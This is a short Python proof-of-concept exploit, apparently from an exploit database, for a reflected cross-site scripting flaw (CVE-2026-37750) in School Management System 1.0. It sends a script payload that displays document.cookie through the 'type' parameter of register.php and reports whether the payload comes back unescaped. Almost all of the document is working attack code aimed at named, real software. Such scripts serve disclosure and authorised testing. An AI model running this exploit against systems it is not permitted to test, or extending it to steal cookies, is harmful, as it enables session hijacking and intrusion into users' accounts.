#!/usr/bin/env python3
# Exploit Title: School Management System 1.0 - Reflected XSS
# Date: 2026-04-16
# Exploit Author: Varad AP Mene (menevarad007@gmail.com)
# Vendor Homepage: https://github.com/mahmoudai1/school-management-system
# Software Link: https://github.com/mahmoudai1/school-management-system
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37750

import requests
import argparse
import sys

def verify_xss(base_url):
    url = f"{base_url}/register.php"
    payload = "<script>alert(document.cookie)</script>"
    params = {'type': payload}
    session = requests.Session()
    session.headers.update({'User-Agent': 'Mozilla/5.0'})
    print(f"[*] Target  : {url}")
    print(f"[*] Payload : {payload}")
    r = session.get(url, params=params, timeout=10)
    if payload in r.text:
        print(f"[+] VULNERABLE! XSS reflected unescaped!")
        print(f"[+] PoC URL: {r.url}")
        return True
    else:
        print(f"[-] Not vulnerable.")
        return False

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', required=True, help='Target URL')
    args = parser.parse_args()
    print("=" * 60)
    print("CVE-2026-37750 — Reflected XSS")
    print("Product: School Management System 1.0")
    print("Author : Varad AP Mene")
    print("=" * 60)
    try:
        result = verify_xss(args.url.rstrip('/'))
        sys.exit(0 if result else 1)
    except Exception as e:
        print(f"[-] Error: {e}")
        sys.exit(1)

if __name__ == '__main__':
    main()